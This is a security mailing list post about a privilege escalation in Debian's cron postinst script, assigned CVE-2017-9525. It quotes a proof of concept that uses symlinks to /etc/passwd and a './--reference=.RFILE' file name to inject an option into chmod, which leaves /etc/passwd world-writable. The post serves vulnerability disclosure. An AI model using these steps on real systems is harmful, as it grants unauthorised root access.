Date: Fri, 9 Jun 2017 20:31:24 +0200 From: Salvatore Bonaccorso <carnil@...ian.org> To: oss-security@...ts.openwall.com Subject: Re: Vixie/ISC Cron group crontab to root escalation Hi On Thu, Jun 08, 2017 at 08:05:34PM +0200, Solar Designer wrote: > In 2003, the original patch went from Owl into Debian (and thus Ubuntu), > along with the original comment above: > > https://anonscm.debian.org/cgit/pkg-cron/pkg-cron.git/commit/?id=ce8f4773590dd76505631bd71874e999a85de607 > > Thanks to Salvatore Bonaccorso of Debian for locating the above URL for > the current discussion. In there, we also see the addition of a > postinst script changing permissions on existing crontab files. This > was also pointed out by Seth Arnold of Ubuntu, who wrote: > > | - postinst scripts are already brittle > | - postinst scripts themselves become a target for elevating privileges if > | they'll just set the permissions as needed > | > | But the Debian/Ubuntu packaging already has scripts for this purpose: > | > | http://sources.debian.net/src/cron/3.0pl1-128/debian/postinst/#L53 > | > | ... > | # Fixup crontab , directory and files for new group 'crontab'. > | # Can't use dpkg-statoverride for this because it doesn't cooperate nicely > | # with cron alternatives such as bcron > | if [ -d $crondir/crontabs ] ; then > | chown root:crontab $crondir/crontabs > | chmod 1730 $crondir/crontabs > | # This used to be done conditionally. For versions prior to "3.0pl1-81" > | # It has been disabled to suit cron alternative such as bcron. > | cd $crondir/crontabs > | set +e > | ls -1 | xargs -r -n 1 --replace=xxx chown 'xxx:crontab' 'xxx' > | ls -1 | xargs -r -n 1 chmod 600 > | set -e > | fi > > Qualys promptly broke this script, replying to Seth: > > | Hmmm, you're right, the script itself is vulnerable to > | group-crontab-to-root escalation of privileges: > | > | root@...ian:~# usermod --append --groups crontab nobody > | root@...ian:~# su --login --shell /bin/bash nobody > | No directory, logging in with HOME=/ > | > | nobody@...ian:/$ id > | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),107(crontab) > | > | nobody@...ian:/$ cd /var/spool/cron/crontabs > | > | # for example, this exploits the chown > | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd- nobody > | > | # for example, this exploits the chmod > | nobody@...ian:/var/spool/cron/crontabs$ touch ./--reference=.RFILE > | nobody@...ian:/var/spool/cron/crontabs$ chmod 0666 .RFILE > .RFILE > | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd 600 > | > | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd* > | -rw-r--r-- 1 root root 1378 May 10 17:16 /etc/passwd > | -rw------- 1 root root 1378 May 10 17:16 /etc/passwd- > | > | # run the postinst script > | root@...ian:~# dpkg-reconfigure cron > | chown: missing operand > | Try 'chown --help' for more information. > | update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults > | > | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd* > | -rw-rw-rw- 1 600 crontab 1378 May 10 17:16 /etc/passwd > | -rw------- 1 nobody crontab 1378 May 10 17:16 /etc/passwd- > | > | So this is a known issue? (there may be more ways to exploit it -- > | spaces, newlines, option injections, etc). > > So this looked like two issues to fix: the temporary file hard link > attack (in OpenBSD, Debian, Ubuntu, ALT Linux, and Owl) and the postinst > script (in Debian and Ubuntu). For the record, the Debian and Ubuntu specific issue with the postinst script has been assigned CVE-2017-9525. For further discussion with the Debian cron maintainers I have as well opened https://bugs.debian.org/864466 Regards, Salvatore
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ